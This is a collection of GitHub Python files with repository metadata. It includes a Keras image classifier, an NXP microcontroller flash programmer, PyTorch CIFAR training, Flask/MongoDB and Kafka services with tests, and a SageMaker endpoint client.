2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\ndata_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\",\n input_shape=(img_height,\n img_width,\n 3)),\n layers.RandomRotation(0.1),\n layers.RandomZoom(0.1),\n ]\n)\n\nplt.figure(figsize=(10, 10))\nfor images, _ in train_ds.take(1):\n for i in range(9):\n augmented_images = data_augmentation(images)\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(augmented_images[0].numpy().astype(\"uint8\"))\n plt.axis(\"off\")\n\n\nmodel = Sequential([\n data_augmentation,\n layers.Rescaling(1./255),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(), \n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Dropout(0.2),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes ,name=\"outputs\")\n])\n\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True),\n metrics=['accuracy'])\n\n\nepochs = 18\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs,\n \n)\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n\ntest_dir = 'test'\n\nfor image_class in os.listdir(test_dir):\n img = cv2.imread(image_class)\n\n\napple_corr = 0\nbanana_corr = 0\norange_corr = 0\nmixed_corr = 0\n\nfor filename in os.listdir(test_dir):\n img = cv2.imread(os.path.join(\"test\", filename))\n # img_data = np.array(img)\n resize = tf.image.resize(img, (img_width, img_height))\n resize = resize.numpy().astype('uint8')\n img_array = tf.keras.utils.img_to_array(resize)\n img_array = tf.expand_dims(img_array, 0)\n predictions = model.predict(img_array)\n score = tf.nn.softmax(predictions[0])\n print(score)\n print(\n \"This image most likely belongs to {} with a {:.2f} percent confidence.\"\n .format(class_names[np.argmax(score)], 100 * np.max(score))\n )\n if class_names[np.argmax(score)] in filename:\n if class_names[np.argmax(score)] == 'apple':\n apple_corr += 1\n elif class_names[np.argmax(score)] == 'banana':\n banana_corr += 1\n elif class_names[np.argmax(score)] == 'orange':\n orange_corr += 1\n elif class_names[np.argmax(score)] == 'mixed':\n mixed_corr += 1\n\nprint(\"Apple Correct: \" + str(apple_corr))\nprint(\"Banana Correct: \" + str(banana_corr))\nprint(\"Orange Correct: \" + str(orange_corr))\nprint(\"Mixed Correct: \" + str(mixed_corr))\n\nAccuracy = (apple_corr + banana_corr + orange_corr + mixed_corr)/60\nAccuracy\n\n\nch_test_dir = 'CH_test'\ntest_ds = tf.keras.utils.image_dataset_from_directory(\n ch_test_dir,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\nevaluation = model.evaluate(test_ds)\nprint(evaluation);\n\n","repo_name":"Huigamlong/ImageClassificationCA","sub_path":"Image_Classification.py","file_name":"Image_Classification.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"559258145","text":"import logging\nimport time\nfrom time import sleep\nimport struct\nimport timeout_decorator\nfrom . import ISPConnection\nfrom .tools import calc_crc\nfrom . import tools\nkTimeout = 1\n\n\n###############################################################\n# Check Sum\n###############################################################\n\n\nclass ChipDescription:\n '''\n Wraps a chip description line and exposes it as a class\n '''\n kWordSize = 4 # 32 bit\n kPageSizeBytes = 64\n SectorSizePages = 16\n CRCLocation = 0x000002fc\n CRCValues = {\n \"NO_ISP\": 0x4e697370,\n \"CRP1\" : 0x12345678,\n \"CRP2\" : 0x87654321,\n \"CRP3\" : 0x43218765,\n }\n\n @property\n def MaxByteTransfer (self):\n return self.RAMBufferSize\n\n def __init__(self, descriptor: dict):\n descriptor: dict\n for name in dict(descriptor):\n self.__setattr__(name, descriptor[name])\n self.CrystalFrequency = 12000#khz == 30MHz\n self.kCheckSumLocation = 7 # 0x0000001c\n\n @property\n def sector_bytes(self):\n sector_bytes = self.SectorSizePages*self.kPageSizeBytes\n assert sector_bytes%self.kWordSize == 0\n assert sector_bytes <= self.MaxByteTransfer\n return sector_bytes\n\n def FlashAddressLegal(self, address):\n return (self.FlashRange[0] <= address <= self.FlashRange[1])\n\n def FlashRangeLegal(self, address, length):\n logging.info(f\"Flash range {self.FlashRange} {address} {length}\")\n return self.FlashAddressLegal(address) and\\\n self.FlashAddressLegal(address + length - 1) and\\\n length <= self.FlashRange[1] - self.FlashRange[0] and\\\n address%self.kPageSizeBytes == 0\n\n def RamAddressLegal(self, address):\n return self.RAMRange[0] <= address <= self.RAMRange[1]\n\n def RamRangeLegal(self, address, length):\n return self.RamAddressLegal(address) and\\\n self.RamAddressLegal(address + length - 1) and\\\n length <= self.RAMRange[1] - self.RAMRange[0] and\\\n address%self.kWordSize == 0\n\n\n\n'''\nScript tools\n'''\n\n\nassert calc_crc(bytes([0xff]*1024)) == 3090874356 # Check the software crc algorithm\n\ndef RemoveBootableCheckSum(vector_table_loc: int, image: bytes) -> bytes:\n '''\n Erases only the checksum, making the image invalid. The chip will reset into the ISP now.\n '''\n kuint32_t_size = 4\n MakeBootable(vector_table_loc, image)\n image_list = list(image)\n for byte in range(kuint32_t_size):\n image_list[vector_table_loc * kuint32_t_size + byte] = 0\n return bytes(image_list)\n\n\ndef GetCheckSumedVectorTable(vector_table_loc: int, orig_image: bytes) -> bytes:\n # make this a valid image by inserting a checksum in the correct place\n vector_table_size = 8\n kuint32_t_size = 4\n\n # Make byte array into list of little endian 32 bit words\n intvecs = struct.unpack(\"<%dI\"%vector_table_size,\n orig_image[:vector_table_size * kuint32_t_size])\n\n # calculate the checksum over the interrupt vectors\n intvecs_list = list(intvecs[:vector_table_size])\n intvecs_list[vector_table_loc] = 0 # clear csum value\n csum = tools.CalculateCheckSum(intvecs_list)\n intvecs_list[vector_table_loc] = csum\n vector_table_bytes = b''\n for vecval in intvecs_list:\n vector_table_bytes += struct.pack(\" bytes:\n vector_table_bytes = GetCheckSumedVectorTable(vector_table_loc, orig_image)\n\n image = vector_table_bytes + orig_image[len(vector_table_bytes):]\n return image\n\n\ndef CheckFlashWrite(isp: ISPConnection, data, flash_address: int) -> bool:\n '''\n Read Memory and compare it to what was written\n baud_rate'''\n\n data_read = isp.ReadMemory(flash_address, len(data))\n\n if len(data) != len(data_read):\n raise ValueError(\"Read Memory received incorrect amount of data\")\n if isinstance(data_read, type(data)):\n raise TypeError(\"data written and data read are of different types\")\n\n return data == data_read\n\n\ndef WriteFlashSector(isp: ISPConnection, chip: ChipDescription, sector: int, data: bytes):\n '''\n Safe way to write to flash sector.\n Basic approach:\n 1. Write bytes to ram\n 2. Prep sectors for writing\n 3. Erase sector\n 4. Prep sector again\n 5. Copy RAM to flash\n\n To make this more robust we check that each step has completed successfully.\n After writing RAM check that the CRC matches the data in.\n After writing the Flash repeat the test\n '''\n flash_write_sleep = 0.1\n ram_write_sleep = 0.1\n ram_address = chip.RAMStartWrite\n flash_address = chip.FlashRange[0] + sector*chip.sector_bytes\n logging.info(\"\\nWriting Sector: %d\\tFlash Address: %x\\tRAM Address: %x\", sector, flash_address, ram_address)\n\n assert len(data) == chip.sector_bytes\n # data += bytes(chip.sector_bytes - len(data))\n\n logging.debug(\"Calculate starting CRC\")\n data_crc = calc_crc(data)\n ram_crc_initial = isp.ReadCRC(ram_address, num_bytes=len(data))\n\n logging.debug(\"Starting CRC: %d\", ram_crc_initial)\n\n logging.debug(\"Writing RAM %d\", ram_address)\n assert chip.RamRangeLegal(ram_address, len(data))\n sleep(ram_write_sleep)\n isp.WriteToRam(ram_address, data)\n sleep(ram_write_sleep)\n isp.reset()\n ram_crc = tools.retry(isp.ReadCRC, count=5, exception=(UserWarning, ValueError))(ram_address, num_bytes=len(data))\n\n # ram_crc = isp.ReadCRC(ram_address, num_bytes=len(data))\n isp.reset()\n if data_crc == ram_crc:\n logging.debug(f\"CRC Check successful {data_crc} {ram_crc}\")\n else:\n logging.error(f\"RAM CRC Check failed {data_crc} {ram_crc}\")\n\n # Check to see if sector is already equal to RAM, if so skip\n ram_equal = isp.MemoryLocationsEqual(flash_address, ram_address, chip.sector_bytes)\n if ram_equal:\n logging.info(\"Flash already equal to RAM, skipping write\")\n return\n\n logging.info(\"Prep Sector\")\n isp.PrepSectorsForWrite(sector, sector)\n logging.info(\"Erase Sector\")\n isp.EraseSector(sector, sector)\n sleep(flash_write_sleep)\n assert isp.CheckSectorsBlank(sector, sector)\n\n logging.info(\"Prep Sector\")\n sector_blank = isp.CheckSectorsBlank(sector, sector)\n assert sector_blank\n isp.PrepSectorsForWrite(sector, sector)\n logging.info(\"Write to Flash\")\n\n assert chip.RamRangeLegal(ram_address, chip.sector_bytes)\n assert chip.FlashRangeLegal(flash_address, chip.sector_bytes)\n\n isp.CopyRAMToFlash(flash_address, ram_address, chip.sector_bytes)\n sleep(flash_write_sleep)\n flash_crc = tools.retry(isp.ReadCRC, count=5, exception=[UserWarning])(flash_address, num_bytes=len(data))\n #flash_crc = isp.ReadCRC()\n assert flash_crc == data_crc\n assert isp.MemoryLocationsEqual(flash_address, ram_address, chip.sector_bytes)\n\n\ndef WriteSector(isp: ISPConnection, chip: ChipDescription, sector: int, data: bytes):\n assert len(data) > 0\n\n if len(data) != chip.sector_bytes: # Fill data buffer to match write size\n data += bytes([0xff] *(chip.sector_bytes - len(data)))\n WriteFlashSector(isp, chip, sector, data)\n\n #assert isp.ReadSector(sector) == data_chunk\n\n\ndef WriteBinaryToFlash(isp: ISPConnection, chip: ChipDescription, image: bytes, start_sector: int) -> int:\n '''\n Take the image as bytes object. Break the image into sectors and write each in reverse order.\n On completion return the flash signature which cna be stored for validity checking\n '''\n flash_write_sleep = 0.25\n assert isinstance(image, bytes)\n logging.info(\"Program Length: %d\", len(image))\n\n sector_count = tools.calc_sector_count(image, chip.sector_bytes)\n if start_sector + sector_count > chip.SectorCount:\n logging.error(f\"Invalid sector count\\t Start: {start_sector}\\tCount: {sector_count}\\tEnd: {chip.SectorCount}\")\n return\n isp.Unlock()\n for sector in reversed(range(start_sector, start_sector + sector_count)):\n logging.info(f\"\\nWriting Sector {sector}\")\n data_chunk = image[(sector-start_sector) * chip.sector_bytes : (sector - start_sector + 1) * chip.sector_bytes]\n WriteSector(isp, chip, sector, data_chunk)\n time.sleep(flash_write_sleep)\n\n assert chip.FlashAddressLegal(chip.FlashRange[0]) and chip.FlashAddressLegal(chip.FlashRange[1])\n ''' Flash signature reading is only supported for some chips and is partially impimented for others.\n sleep(0.5)\n chip_flash_sig = isp.ReadFlashSig(chip.FlashRange[0], chip.FlashRange[1])\n logging.info(f\"Flash Signature: {chip_flash_sig}\")\n logging.info(\"Programming Complete.\")\n return chip_flash_sig\n '''\n\n\ndef WriteImage(isp: ISPConnection, chip: ChipDescription, imagein: bytes):\n '''\n 1. Overwrite first sector which clears the checksum bytes making the image unbootable, preventing bricking\n 2. Read the binary file into memory as a bytes object\n 3. Write the checksum to the image\n 4. Write the image in reverse order, the checksum will only be written once the entire valid image is written\n '''\n # make not bootable\n isp.Unlock()\n WriteSector(isp, chip, 0, bytes([0xde]*chip.sector_bytes))\n\n #image = RemoveBootableCheckSum(chip.kCheckSumLocation, prog)\n image = MakeBootable(chip.kCheckSumLocation, imagein)\n WriteBinaryToFlash(isp, chip, image, start_sector=0)\n\n\ndef FindFirstBlankSector(isp: ISPConnection, chip) -> int:\n '''\n Returns the first blank sector, returns the last sector on failure\n '''\n for sector in range(chip.SectorCount):\n if isp.CheckSectorsBlank(sector, chip.SectorCount - 1):\n return sector\n return chip.SectorCount - 1\n\n\ndef ReadSector(isp: ISPConnection, chip: ChipDescription, sector: int) -> bytes:\n\n start = sector*chip.sector_bytes\n assert chip.FlashRangeLegal(start, chip.sector_bytes)\n return isp.ReadMemory(start, chip.sector_bytes)\n\n\ndef ReadImage(isp: ISPConnection, chip: ChipDescription) -> bytes:\n image = bytes()\n blank_sector = FindFirstBlankSector(isp, chip)\n sectors = []\n for sector in range(blank_sector):\n logging.info(\"Sector %d\", sector)\n sector = ReadSector(isp, chip, sector)\n sectors.append(sector)\n\n return image.join(sectors)\n\n\ndef MassErase(isp: ISPConnection, chip: ChipDescription):\n last_sector = chip.SectorCount - 1\n isp.reset()\n isp.Unlock()\n isp.PrepSectorsForWrite(0, last_sector)\n isp.EraseSector(0, last_sector)\n\n\ndef InitConnection(isp: ISPConnection, chip):\n isp.reset()\n try:\n try:\n isp.SyncConnection()\n except (UserWarning, timeout_decorator.TimeoutError) as e:\n logging.error(f\"Sync Failed {e}\")\n logging.debug(\"Connect to running ISP\")\n # isp.Write(bytes(isp.kNewLine, encoding=\"utf-8\"))\n # After syncronization some devices send a second OK at the first\n # command\n isp.SetEcho(False)\n isp.SetBaudRate(isp.baud_rate)\n logging.info(\"Baudrate set to %d\", isp.baud_rate)\n isp.SetCrystalFrequency(chip.CrystalFrequency)\n isp.reset()\n except Exception as e:\n logging.error(e)\n raise\n","repo_name":"snhobbs/NXPISP","sub_path":"ISPProgrammer/nxp.py","file_name":"nxp.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"1577861679","text":"import torch\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom lenet5 import Lenet5\r\nfrom torch import nn, optim\r\n\r\n\r\ndef main():\r\n batchsz = 32\r\n cifar_train = datasets.CIFAR10(\"cifar\", True, transform=transforms.Compose([\r\n transforms.Resize((32, 32)),\r\n transforms.ToTensor()\r\n ]), download=True)\r\n cifar_train = DataLoader(cifar_train, batch_size=batchsz, shuffle=True)\r\n\r\n cifar_test = datasets.CIFAR10(\"cifar\", False, transform=transforms.Compose([\r\n transforms.Resize((32, 32)),\r\n transforms.ToTensor()\r\n ]), download=True)\r\n cifar_test = DataLoader(cifar_test, batch_size=batchsz, shuffle=True)\r\n\r\n x, label = iter(cifar_train).next()\r\n print(\"x:\", x.shape, \"label:\",label.shape)\r\n\r\n\r\n device = torch.device('cuda')\r\n model = Lenet5().to(device)\r\n criteon = nn.CrossEntropyLoss().to(device)\r\n optimzer = optim.Adam(model.parameters(), lr=1e-3)\r\n print(model)\r\n for epoch in range(1000):\r\n\r\n for batchidx, (x, label) in enumerate(cifar_train):\r\n # [b, 3, 32, 32]\r\n #[b]\r\n x, label = x.to(device), label.to(device)\r\n\r\n logits = model(x)\r\n # logits : [b, 10]\r\n # label : [b]\r\n # loss : tensot scalar\r\n loss = criteon(logits, label)\r\n\r\n #backprop\r\n optimzer.zero_grad()\r\n loss.bacward() # 这里得到的梯度会累加到原来的梯度上面,所以在上一步要有清零操作这样才能得到新的梯度而不是与旧锑度的相加\r\n optimzer.step()\r\n\r\n print(epoch, loss.item())\r\n\r\n # 实战0\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Witure/My_PyTorch","sub_path":"实战1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18457415400","text":"# Question\n# Given an array of length n+1 containing values(a[i]) where 1<=a[i]<=n. There exists one duplicate element occuring more than once while the rest of the elements occur once. Find that duplicate element.\n#\n# Sample Input\n# 1 4 2 5 2 3\n#\n# Sample Output\n# 2\n\ndef Duplicates(arr):\n for i in range(len(arr)):\n x = abs(arr[i])\n if arr[x-1] < 0:\n return x\n arr[x-1] = -(arr[x-1])\n\n\narr = list(map(int, input().split()))\nprint(Duplicates(arr))\n","repo_name":"shreyasl10/Algorithms","sub_path":"Arrays/FindDuplicates.py","file_name":"FindDuplicates.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21713423584","text":"import pytest\nimport requests\n\n# Define the base URL for the Flask app\nBASE_URL_CUSTOMER = 'http://127.0.0.1:5001'\nBASE_URL_SERVICE3 = 'http://127.0.0.1:5003'\n\n# Define test functions for each endpoint in app.py\n\ndef get_customer_wallet_balance(username):\n \"\"\"\n Helper function to get the wallet balance of a customer.\n \"\"\"\n response = requests.get(f'{BASE_URL_CUSTOMER}/get_customer/{username}')\n return response.json().get('wallet_balance', 0.0)\n\ndef get_good_price(good_name):\n \"\"\"\n Helper function to get the price of a good.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/{good_name}')\n good_details = response.json()\n return good_details.get('price', 0.0)\n\ndef test_display_available_goods_route():\n \"\"\"\n Test the /display_available_goods endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/display_available_goods')\n assert response.status_code == 200\n\ndef test_get_good_details_route():\n \"\"\"\n Test the /get_good_details/ endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/Laptop')\n assert response.status_code == 200\n\ndef test_make_sale_route():\n \"\"\"\n Test the /make_sale endpoint.\n\n Asserts that the status code of the response is 200 and checks if the correct amount is deducted.\n \"\"\"\n # Get the user's wallet balance before the purchase\n initial_wallet_balance = get_customer_wallet_balance(\"hemag\")\n\n # Get the good's details\n good_details_response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/laptop')\n good_details = good_details_response.json()\n\n # Extract the price from the good details\n good_price = good_details.get('price', 0.0)\n\n # Make the purchase\n response = requests.post(f'{BASE_URL_SERVICE3}/make_sale', json={\n \"customer_username\": \"hemag\",\n \"good_name\": \"laptop\"\n })\n assert response.status_code == 200\n\n # Get the user's wallet balance after the purchase\n final_wallet_balance = get_customer_wallet_balance(\"hemag\")\n\n # Check if the correct amount is deducted\n assert final_wallet_balance == (initial_wallet_balance - good_price)\n\ndef test_full_purchase_history_route():\n \"\"\"\n Test the /full_purchase_history endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/full_purchase_history')\n assert response.status_code == 200\n\ndef test_user_purchase_history_route():\n \"\"\"\n Test the /user_purchase_history/ endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/user_purchase_history/hemag')\n assert response.status_code == 200\n\n# Run the tests\n\nif __name__ == '__main__':\n pytest.main(['-v', 'test_service3.py'])\n","repo_name":"MoSlyH1/hello","sub_path":"test_service3.py","file_name":"test_service3.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19455749630","text":"#!/usr/bin/env python\n\nimport rospy\nfrom artist_performer import BaxterController\n\ndef main():\n rospy.loginfo(\"Initializing node... \")\n rospy.init_node(\"play_xylophone\")\n controller = BaxterController()\n\n controller.set_neutral()\n\n rospy.signal_shutdown(\"Finished control\")\n\nif __name__ == '__main__':\n main()","repo_name":"jasonsbrooks/ARTIST","sub_path":"scripts/set_neutral.py","file_name":"set_neutral.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35824092907","text":"import requests\n\nfrom ..exceptions import InvalidAuthorization, DocumentNotFound, ImperialError\nfrom ..utils import ensure_json, to_snake_case, parse_dates\nfrom ..client.body import Body\n\n\ndef request(*, method: str, url: str, api_token: str = None, **kwargs) -> dict:\n # url is a hostname obj with a repr of the url\n # not sure where, but somewhere it gets converted to string,\n # but this could possibly cause issues on other versions\n\n # api_token gets mixed in with **kwargs inside Body constructor\n body = Body(method=method, api_token=api_token, **kwargs)\n headers = body.headers.copy()\n headers.update({\n \"User-Agent\": \"imperial-py; (+https://github.com/imperialbin/imperial-py)\"\n })\n\n resp = requests.request(\n method=method,\n url=url,\n headers=headers,\n params=body.params,\n json=body.json\n )\n\n json = ensure_json(resp)\n json = to_snake_case(json)\n success = json.get(\"success\", False)\n message = json.get(\"message\", None)\n\n if resp.status_code == 401:\n raise InvalidAuthorization(message, api_token=api_token)\n if resp.status_code == 404:\n raise DocumentNotFound(kwargs.get(\"document_id\", None))\n if not success:\n raise ImperialError(message)\n\n json = parse_dates(json)\n return json\n","repo_name":"imperialbin/imperial.py","sub_path":"imperial/client/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"18784347149","text":"from unittest import mock\n\nfrom controllers.login_controller import LoginController\nfrom controllers.music_data_controller import MusicDataController\nfrom src.factories.controller_factory import ControllerFactory\nfrom utils import configLoader\n\n\n@mock.patch.object(configLoader.ConfigLoader, \"load_config\")\ndef test_create_object_when_login_controller_then_return_login_controller(mock):\n cf = ControllerFactory()\n result = cf.create_object(\"login_controller\")\n assert isinstance(result, LoginController)\n\n\ndef test_create_object_when_unknown_then_return_none():\n cf = ControllerFactory()\n result = cf.create_object(\"unknown\")\n assert result is None\n\n\n@mock.patch.object(configLoader.ConfigLoader, \"load_config\")\ndef test_create_object_when_music_data_controller_then_return_music_data_controller(mock):\n cf = ControllerFactory()\n result = cf.create_object(\"music_controller\")\n assert isinstance(result, MusicDataController)\n","repo_name":"prannoymulmi/Music-Storage-System","sub_path":"tests/factories/test_controller_factory.py","file_name":"test_controller_factory.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5611099726","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\nCORS(app)\n\n# Set up MongoDB connection\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client['scrapper']\ncollection = db['commissioners']\norganizationsCollection = db['organizations']\nrolesCollection = db['roles']\n\n\n# Define route to retrieve commissioner data\n@app.route('/commissioners', methods=['GET'])\ndef get_commissioners():\n commissioners = []\n for commissioner in collection.find():\n commissioners.append({\n 'name': commissioner['name'],\n 'role': commissioner['role'],\n 'organization': commissioner['organization'],\n 'image': commissioner['image'],\n 'profileLink': commissioner['profileLink'],\n 'address': commissioner['address'],\n 'address2': commissioner['address2'],\n 'myTeamsLink': commissioner['myTeamsLink'],\n 'team': commissioner['team']\n })\n return jsonify(commissioners)\n\n\n@app.route('/roles', methods=['GET'])\ndef get_roles():\n roles = []\n for role in rolesCollection.find():\n print(role)\n roles.append({\n 'name': role['name']\n })\n print(roles)\n return jsonify(roles)\n\n\n@app.route('/organizations', methods=['GET'])\ndef get_organztions():\n organizations = []\n for organization in organizationsCollection.find():\n organizations.append({\n 'name': organization['name']\n })\n return jsonify(organizations)\n\n\nif __name__ == '__main__':\n app.run(debug=True,host=\"0.0.0.0\",port=4554)\n","repo_name":"Mushi42/python-gram-bot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8607490817","text":"from django.core.management import BaseCommand, CommandError\nimport os\nimport json\nfrom products.models import Category\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('--file', '-f', type=str)\n\n def handle(self, *args, **options):\n file_path = options.get('file')\n if not file_path:\n raise CommandError('File not provided')\n if not file_path.endswith('.json'):\n raise CommandError('Only .json file supported')\n\n file_path = os.path.join('data', file_path)\n try:\n with open(file_path) as import_file:\n categories = json.load(import_file)\n except FileNotFoundError as e:\n raise CommandError('File at %s not found: ' % os.path.join('data', file_path))\n\n for category in categories:\n db_categories = Category(\n name=category['name']\n )\n db_categories.save()\n\n","repo_name":"ciurezbogdan/Bogdans_shop","sub_path":"products/management/commands/import_category.py","file_name":"import_category.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29648060041","text":"import sys\n\nr, c = map(int, input().split())\n# r : 행, c: 열\n\ngraph = []\n\nfor i in range(r):\n graph.append(list(sys.stdin.readline().rstrip()))\n\nvisited = [[False] * c for _ in range(r)]\ncount = 0\n\n\ndef dfs(x, y):\n if x < 0 or x > (r - 1) or y < 0 or y > (c - 1):\n return 0\n if y == c - 1:\n return 1\n if not visited[x][y] and graph[x][y] == '.':\n visited[x][y] = True\n if dfs(x - 1, y + 1):\n return 1\n if dfs(x, y + 1):\n return 1\n if dfs(x + 1, y + 1):\n return 1\n return 0\n\n\nfor i in range(r):\n count += dfs(i, 0)\n\nprint(count)","repo_name":"khman119/Algorithm","sub_path":"알고리즘 유형별 기출문제/백준/그리디/3109_빵집.py","file_name":"3109_빵집.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71899096222","text":"#!/usr/bin/env python\r\n\r\n\"\"\"Consumes stream for printing all messages to the console.\r\n\"\"\"\r\n\r\nimport argparse\r\nimport json\r\nimport sys\r\nimport time\r\nimport socket\r\nfrom confluent_kafka import Consumer, KafkaError, KafkaException\r\nfrom pymongo import MongoClient\r\nimport pymongo\r\n\r\n\r\ndef msg_process(msg, collection):\r\n # Print the current time and the message.\r\n time_start = time.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n val = msg.value()\r\n dval = json.loads(val)\r\n print(time_start, dval)\r\n\r\n # Almacenar el mensaje en MongoDB\r\n collection.insert_one(dval)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument('topic', type=str, help='Name of the Kafka topic to stream.')\r\n args = parser.parse_args()\r\n\r\n running = True\r\n\r\n conf = {\r\n 'bootstrap.servers': 'localhost:9092', # Dirección y puerto de los servidores de Kafka\r\n 'group.id': 'my-consumer-group', # ID del grupo de consumidores\r\n }\r\n\r\n consumer = Consumer(conf)\r\n\r\n # Configurar la conexión a MongoDB\r\n client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n db = client[\"portdata\"]\r\n print(client.list_database_names())\r\n collection = db[\"mycollection\"]\r\n\r\n try:\r\n while running:\r\n consumer.subscribe([args.topic])\r\n\r\n msg = consumer.poll(1)\r\n if msg is None:\r\n continue\r\n\r\n if msg.error():\r\n if msg.error().code() == KafkaError._PARTITION_EOF:\r\n # End of partition event\r\n sys.stderr.write('%% %s [%d] reached end at offset %d\\n' %\r\n (msg.topic(), msg.partition(), msg.offset()))\r\n elif msg.error().code() == KafkaError.UNKNOWN_TOPIC_OR_PART:\r\n sys.stderr.write('Topic unknown, creating %s topic\\n' %\r\n (args.topic))\r\n elif msg.error():\r\n raise KafkaException(msg.error())\r\n else:\r\n msg_process(msg, collection)\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n finally:\r\n # Close down consumer to commit final offsets.\r\n consumer.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Ainhoa1409/Logistica_puerto","sub_path":"time-series-kafka-demo/bin/processStream.py","file_name":"processStream.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33218303510","text":"import sys\nimport reader\n\nif len(sys.argv) > 1:\n r = reader.Reader(sys.argv[1])\n try:\n print(r.read())\n finally:\n r.close()\n\nclass CallCount:\n def __init__(self, f):\n print('Creating Instance of {}'.format(__name__))\n self.f = f\n self.count = 0\n def action(self):\n print('Action')\n def __call__(self, *args, **kwargs):\n self.count += 1\n return self.f(*args, **kwargs)\n\n\n@CallCount\ndef test():\n print('MyFunction')\n\ntest()\ntest()\ntest()\nprint(test.count) ","repo_name":"albertocota/bz2_gzip","sub_path":"reader/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30386718045","text":"import boto3\n\ndef check_status(app_name):\n sage_client = boto3.client('sagemaker', region_name=\"us-west-2\")\n endpoint_description = sage_client.describe_endpoint(EndpointName=app_name)\n return endpoint_description['EndpointStatus']\n\napp_name = 'dl-sentiment-model'\n\nprint(\"Application status is: {}\".format(check_status(app_name)))\n\nif check_status(app_name) == 'InService':\n client = boto3.client('sagemaker-runtime')\n\n content_type = \"application/json; format=pandas-split\" \n accept = \"text/plain\" \n payload = '{\"columns\": [\"text\"],\"data\": [[\"This is the best movie we saw.\"], [\"What a movie!\"]]}'\n\n response = client.invoke_endpoint(\n EndpointName=app_name, \n ContentType=content_type,\n Accept=accept,\n Body=payload\n )\n\n print(response['Body'].read().decode('utf-8')) 